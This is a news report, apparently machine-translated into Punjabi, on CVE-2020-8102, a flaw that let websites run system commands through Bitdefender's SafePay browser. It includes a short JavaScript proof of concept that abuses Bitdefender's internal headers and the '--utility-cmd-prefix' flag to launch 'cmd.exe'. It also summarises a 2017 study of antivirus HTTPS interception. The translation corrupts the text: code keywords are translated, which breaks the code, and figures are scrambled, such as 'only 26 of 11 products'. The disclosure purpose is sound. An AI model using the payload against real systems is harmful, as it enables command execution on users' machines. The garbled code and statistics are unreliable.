Bitdefender SafePay ਸੁਰੱਖਿਅਤ ਬ੍ਰਾਊਜ਼ਰ ਵਿੱਚ ਕੋਡ ਐਗਜ਼ੀਕਿਊਸ਼ਨ ਕਮਜ਼ੋਰੀ

ਵਲਾਦੀਮੀਰ ਪਲੈਂਟ, ਐਡਬਲਾਕ ਪਲੱਸ ਦੇ ਨਿਰਮਾਤਾ, ਪਛਾਣਿਆ ਕਮਜ਼ੋਰੀ (CVE-2020-8102) Chromium ਇੰਜਣ 'ਤੇ ਆਧਾਰਿਤ ਵਿਸ਼ੇਸ਼ Safepay ਵੈੱਬ ਬ੍ਰਾਊਜ਼ਰ ਵਿੱਚ, Bitdefender ਕੁੱਲ ਸੁਰੱਖਿਆ 2020 ਐਂਟੀਵਾਇਰਸ ਪੈਕੇਜ ਦੇ ਹਿੱਸੇ ਵਜੋਂ ਪੇਸ਼ ਕੀਤਾ ਗਿਆ ਹੈ ਅਤੇ ਗਲੋਬਲ ਨੈੱਟਵਰਕ 'ਤੇ ਉਪਭੋਗਤਾ ਦੇ ਕੰਮ ਦੀ ਸੁਰੱਖਿਆ ਨੂੰ ਵਧਾਉਣਾ ਹੈ (ਉਦਾਹਰਨ ਲਈ, ਬੈਂਕਾਂ ਤੱਕ ਪਹੁੰਚ ਕਰਨ ਵੇਲੇ ਵਾਧੂ ਅਲੱਗ-ਥਲੱਗ ਪ੍ਰਦਾਨ ਕੀਤਾ ਜਾਂਦਾ ਹੈ ਅਤੇ ਭੁਗਤਾਨ ਪ੍ਰਣਾਲੀਆਂ)। ਕਮਜ਼ੋਰੀ ਬ੍ਰਾਊਜ਼ਰ ਵਿੱਚ ਖੋਲ੍ਹੀਆਂ ਗਈਆਂ ਵੈੱਬਸਾਈਟਾਂ ਨੂੰ ਓਪਰੇਟਿੰਗ ਸਿਸਟਮ ਪੱਧਰ 'ਤੇ ਆਪਹੁਦਰੇ ਕੋਡ ਨੂੰ ਲਾਗੂ ਕਰਨ ਦੀ ਇਜਾਜ਼ਤ ਦਿੰਦੀ ਹੈ।

ਸਮੱਸਿਆ ਦਾ ਕਾਰਨ ਇਹ ਹੈ ਕਿ Bitdefender ਐਂਟੀਵਾਇਰਸ ਸਾਈਟ ਦੇ ਅਸਲ TLS ਸਰਟੀਫਿਕੇਟ ਨੂੰ ਬਦਲ ਕੇ HTTPS ਟ੍ਰੈਫਿਕ ਦੀ ਸਥਾਨਕ ਰੁਕਾਵਟ ਕਰਦਾ ਹੈ। ਕਲਾਇੰਟ ਦੇ ਸਿਸਟਮ 'ਤੇ ਇੱਕ ਵਾਧੂ ਰੂਟ ਸਰਟੀਫਿਕੇਟ ਸਥਾਪਤ ਕੀਤਾ ਗਿਆ ਹੈ, ਜਿਸ ਨਾਲ ਵਰਤੇ ਗਏ ਟ੍ਰੈਫਿਕ ਨਿਰੀਖਣ ਪ੍ਰਣਾਲੀ ਦੇ ਸੰਚਾਲਨ ਨੂੰ ਲੁਕਾਉਣਾ ਸੰਭਵ ਹੋ ਜਾਂਦਾ ਹੈ। ਐਂਟੀਵਾਇਰਸ ਆਪਣੇ ਆਪ ਨੂੰ ਸੁਰੱਖਿਅਤ ਟ੍ਰੈਫਿਕ ਵਿੱਚ ਪਾੜਦਾ ਹੈ ਅਤੇ ਸੁਰੱਖਿਅਤ ਖੋਜ ਫੰਕਸ਼ਨ ਨੂੰ ਲਾਗੂ ਕਰਨ ਲਈ ਕੁਝ ਪੰਨਿਆਂ ਵਿੱਚ ਆਪਣਾ ਖੁਦ ਦਾ JavaScript ਕੋਡ ਸ਼ਾਮਲ ਕਰਦਾ ਹੈ, ਅਤੇ ਸੁਰੱਖਿਅਤ ਕਨੈਕਸ਼ਨ ਸਰਟੀਫਿਕੇਟ ਨਾਲ ਸਮੱਸਿਆਵਾਂ ਦੀ ਸਥਿਤੀ ਵਿੱਚ, ਇਹ ਵਾਪਸ ਕੀਤੇ ਗਏ ਗਲਤੀ ਪੰਨੇ ਨੂੰ ਆਪਣੇ ਨਾਲ ਬਦਲ ਦਿੰਦਾ ਹੈ। ਕਿਉਂਕਿ ਨਵਾਂ ਅਸ਼ੁੱਧੀ ਪੰਨਾ ਖੋਲ੍ਹੇ ਜਾ ਰਹੇ ਸਰਵਰ ਦੀ ਤਰਫੋਂ ਦਿੱਤਾ ਜਾਂਦਾ ਹੈ, ਇਸ ਲਈ ਉਸ ਸਰਵਰ ਦੇ ਦੂਜੇ ਪੰਨਿਆਂ ਨੂੰ Bitdefender ਦੁਆਰਾ ਪਾਈ ਸਮੱਗਰੀ ਤੱਕ ਪੂਰੀ ਪਹੁੰਚ ਹੁੰਦੀ ਹੈ।

ਇੱਕ ਹਮਲਾਵਰ ਦੁਆਰਾ ਨਿਯੰਤਰਿਤ ਇੱਕ ਸਾਈਟ ਨੂੰ ਖੋਲ੍ਹਣ ਵੇਲੇ, ਉਹ ਸਾਈਟ ਇੱਕ XMLHttpRequest ਭੇਜ ਸਕਦੀ ਹੈ ਅਤੇ ਜਵਾਬ ਦੇਣ ਵੇਲੇ HTTPS ਸਰਟੀਫਿਕੇਟ ਨਾਲ ਸਮੱਸਿਆਵਾਂ ਪੈਦਾ ਕਰ ਸਕਦੀ ਹੈ, ਜਿਸ ਨਾਲ Bitdefender ਦੁਆਰਾ ਧੋਖਾਧੜੀ ਕੀਤੇ ਗਏ ਇੱਕ ਗਲਤੀ ਪੰਨੇ ਦੀ ਵਾਪਸੀ ਹੋਵੇਗੀ। ਕਿਉਂਕਿ ਗਲਤੀ ਪੰਨਾ ਹਮਲਾਵਰ ਦੇ ਡੋਮੇਨ ਦੇ ਸੰਦਰਭ ਵਿੱਚ ਖੋਲ੍ਹਿਆ ਗਿਆ ਹੈ, ਉਹ ਬਿਟਡੇਫੈਂਡਰ ਪੈਰਾਮੀਟਰਾਂ ਨਾਲ ਸਪੂਫ ਕੀਤੇ ਪੰਨੇ ਦੀਆਂ ਸਮੱਗਰੀਆਂ ਨੂੰ ਪੜ੍ਹ ਸਕਦਾ ਹੈ। Bitdefender ਦੁਆਰਾ ਪ੍ਰਦਾਨ ਕੀਤੇ ਗਏ ਪੰਨੇ ਵਿੱਚ ਇੱਕ ਸੈਸ਼ਨ ਕੁੰਜੀ ਵੀ ਸ਼ਾਮਲ ਹੈ ਜੋ ਤੁਹਾਨੂੰ ਇੱਕ ਵੱਖਰੇ Safepay ਬ੍ਰਾਊਜ਼ਰ ਸੈਸ਼ਨ ਨੂੰ ਸ਼ੁਰੂ ਕਰਨ ਲਈ, ਆਰਬਿਟਰੇਰੀ ਕਮਾਂਡ ਲਾਈਨ ਫਲੈਗ ਨਿਰਧਾਰਤ ਕਰਨ, ਅਤੇ “--utility-cmd-prefix” ਦੀ ਵਰਤੋਂ ਕਰਦੇ ਹੋਏ ਕਿਸੇ ਵੀ ਸਿਸਟਮ ਕਮਾਂਡਾਂ ਨੂੰ ਲਾਂਚ ਕਰਨ ਲਈ ਅੰਦਰੂਨੀ ਬਿਟਡੀਫੈਂਡਰ API ਦੀ ਵਰਤੋਂ ਕਰਨ ਦੀ ਇਜਾਜ਼ਤ ਦਿੰਦੀ ਹੈ। ਝੰਡਾ ਇੱਕ ਸ਼ੋਸ਼ਣ ਦੀ ਇੱਕ ਉਦਾਹਰਨ (param1 ਅਤੇ param2 ਗਲਤੀ ਪੰਨੇ ਤੋਂ ਪ੍ਰਾਪਤ ਕੀਤੇ ਮੁੱਲ ਹਨ):

var ਬੇਨਤੀ = ਨਵੀਂ XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada —utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");

ਦੱਸ ਦੇਈਏ ਕਿ 2017 ਵਿੱਚ ਕੀਤੇ ਗਏ ਇੱਕ ਅਧਿਐਨ ਪ੍ਰਗਟ24 ਵਿੱਚੋਂ 26 ਟੈਸਟ ਕੀਤੇ ਐਨਟਿਵ਼ਾਇਰਅਸ ਉਤਪਾਦ ਜੋ ਪ੍ਰਮਾਣ ਪੱਤਰ ਸਪੂਫਿੰਗ ਰਾਹੀਂ HTTPS ਟ੍ਰੈਫਿਕ ਦੀ ਜਾਂਚ ਕਰਦੇ ਹਨ, ਇੱਕ HTTPS ਕਨੈਕਸ਼ਨ ਦੇ ਸਮੁੱਚੇ ਸੁਰੱਖਿਆ ਪੱਧਰ ਨੂੰ ਘਟਾ ਦਿੰਦੇ ਹਨ।
11 ਉਤਪਾਦਾਂ ਵਿੱਚੋਂ ਸਿਰਫ਼ 26 ਨੇ ਮੌਜੂਦਾ ਸਾਈਫਰ ਸੂਟ ਪ੍ਰਦਾਨ ਕੀਤੇ ਹਨ। 5 ਸਿਸਟਮਾਂ ਨੇ ਸਰਟੀਫਿਕੇਟਾਂ ਦੀ ਪੁਸ਼ਟੀ ਨਹੀਂ ਕੀਤੀ (ਕੈਸਪਰਸਕੀ ਇੰਟਰਨੈਟ ਸੁਰੱਖਿਆ 16 ਮੈਕ, NOD32 AV 9, ਸਾਈਬਰਸਿਟਰ, ਨੈੱਟ ਨੈਨੀ 7 ਵਿਨ, ਨੈੱਟ ਨੈਨੀ 7 ਮੈਕ)। ਕੈਸਪਰਸਕੀ ਇੰਟਰਨੈਟ ਸੁਰੱਖਿਆ ਅਤੇ ਕੁੱਲ ਸੁਰੱਖਿਆ ਉਤਪਾਦ ਹਮਲੇ ਦੇ ਅਧੀਨ ਸਨ CRIME, ਅਤੇ AVG, Bitdefender ਅਤੇ Bullguard ਉਤਪਾਦਾਂ 'ਤੇ ਹਮਲਾ ਕੀਤਾ ਗਿਆ ਹੈ ਖੜੋਤ и ਪੂਡਲ. Dr.Web Antivirus 11 ਤੁਹਾਨੂੰ ਅਵਿਸ਼ਵਾਸਯੋਗ ਐਕਸਪੋਰਟ ਸਿਫਰਾਂ (ਹਮਲਾ) 'ਤੇ ਵਾਪਸ ਜਾਣ ਦੀ ਇਜਾਜ਼ਤ ਦਿੰਦਾ ਹੈ ਫ੍ਰੀਕ).

ਸਰੋਤ: opennet.ru